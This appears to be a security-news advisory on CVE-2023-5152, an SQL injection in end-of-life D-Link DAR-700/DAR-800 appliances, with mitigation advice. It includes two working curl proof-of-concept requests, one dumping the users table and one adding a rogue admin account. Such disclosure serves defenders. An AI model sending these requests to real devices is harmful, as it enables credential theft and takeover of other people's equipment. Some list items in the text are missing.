CVE CyberSecurity Database News

CVE-2023-5152 - Critical SQL Injection in D-Link DAR-700 / DAR-800 (EOL) — Vulnerability Details, Exploit Example & Mitigation

Poster -

A critical security vulnerability (CVE-2023-5152) has been found affecting end-of-life D-Link DAR-700 and DAR-800 network appliances (firmware up to 20151231). The issue lives within the /importexport.php file, specifically through unsanitized use of the sql parameter, which opens the doors to SQL injection attacks.

What makes this situation worse: these products are no longer supported, meaning no security updates will ever be released. If you’re still running these devices anywhere, even in a lab, you should treat this vulnerability as urgent and retire these products as soon as possible.

Below, we’ll break down the vulnerability, show an exploit example, link to the official references, and discuss what to do next.

- File: /importexport.php

Parameter: sql

- Vulnerability Type: SQL Injection (OWASP Top 10 - Injection Attacks)

Status: Product is no longer supported (End-Of-Life)

Vulnerability Database link:
- VDB-240248

CVE Details:
- CVE-2023-5152 on CVEv4 MITRE

Vulnerability Details

The /importexport.php feature is supposed to handle database operations for importing/exporting settings or records. However, it takes a sql parameter from the user (possibly via GET or POST), and directly passes it into a SQL query on the backend without any kind of input sanitization or use of prepared statements.

Why It’s Dangerous

Any attacker with network access (possibly even over the internet, if you’re exposing the device’s management interface) can craft a malicious request that runs arbitrary SQL code. This can mean:

Exploit Example

Below is a proof-of-concept (PoC) request for this vulnerability. We’ll show a simple attack using curl to extract the device’s user data (~simulate something like dumping admin credentials).

Example: Extracting User Account Information

curl -k "https://<device-ip>/importexport.php?sql=SELECT%20*%20FROM%20users--";

More Sophisticated Attack: Adding Admin User

curl -k "https://<device-ip>/importexport.php?sql=INSERT%20INTO%20users%20(username,password,role)%20VALUES%20('eviladmin','badpass',1)--";

With this, a new admin-level user eviladmin with password badpass may be inserted.

Impact

This vulnerability is as bad as it gets — allowing any attacker to take total control over the device with a single HTTP request.

No fix will ever be issued

This leaves all DAR-700 and DAR-800 devices (up to 20151231 firmware) open to remote takeover.

Real-World Exploitation

The existence of a public exploit (see VulDB link) means attackers are likely already using this flaw to hunt for legacy D-Link devices exposed online.

These models are no longer supported, no patch will come.

- Replace with a modern, supported firewall/router.

2. Network Segmentation

- If you can’t replace yet (not recommended), at a minimum, *remove internet-facing access*. Restrict management to a trusted internal VLAN.

3. Monitor for Compromise

- Review the device’s config, user accounts, and logs. If you detect any unrecognized changes or accounts, assume full compromise.

4. Don’t Trust “End-Of-Life” Hardware

- Any unsupported device is a ticking time bomb as new vulnerabilities are published and never patched.

References & Further Reading

- VulDB Advisory VDB-240248
- CVE-2023-5152 - MITRE
- D-Link EOL Product List *(for reference, D-Link clearly lists these models as unsupported)*
- OWASP: SQL Injection Explained

Summary

CVE-2023-5152 is a critical SQL Injection vulnerability affecting old D-Link DAR-700 and DAR-800 appliances. There is no fix. If you’re running these, you must replace them immediately. Exposed devices are now wide open to attackers with easy-to-use, public exploits.


For those still relying on these D-Link appliances, this is a final wake-up call: end-of-life does not mean “use it anyway.” It means “retire now, or get hacked.”


*Stay safe, and always keep your network gear on supported firmware!*

Timeline

Published on: 09/25/2023 02:15:10 UTC
Last modified on: 11/16/2023 03:06:57 UTC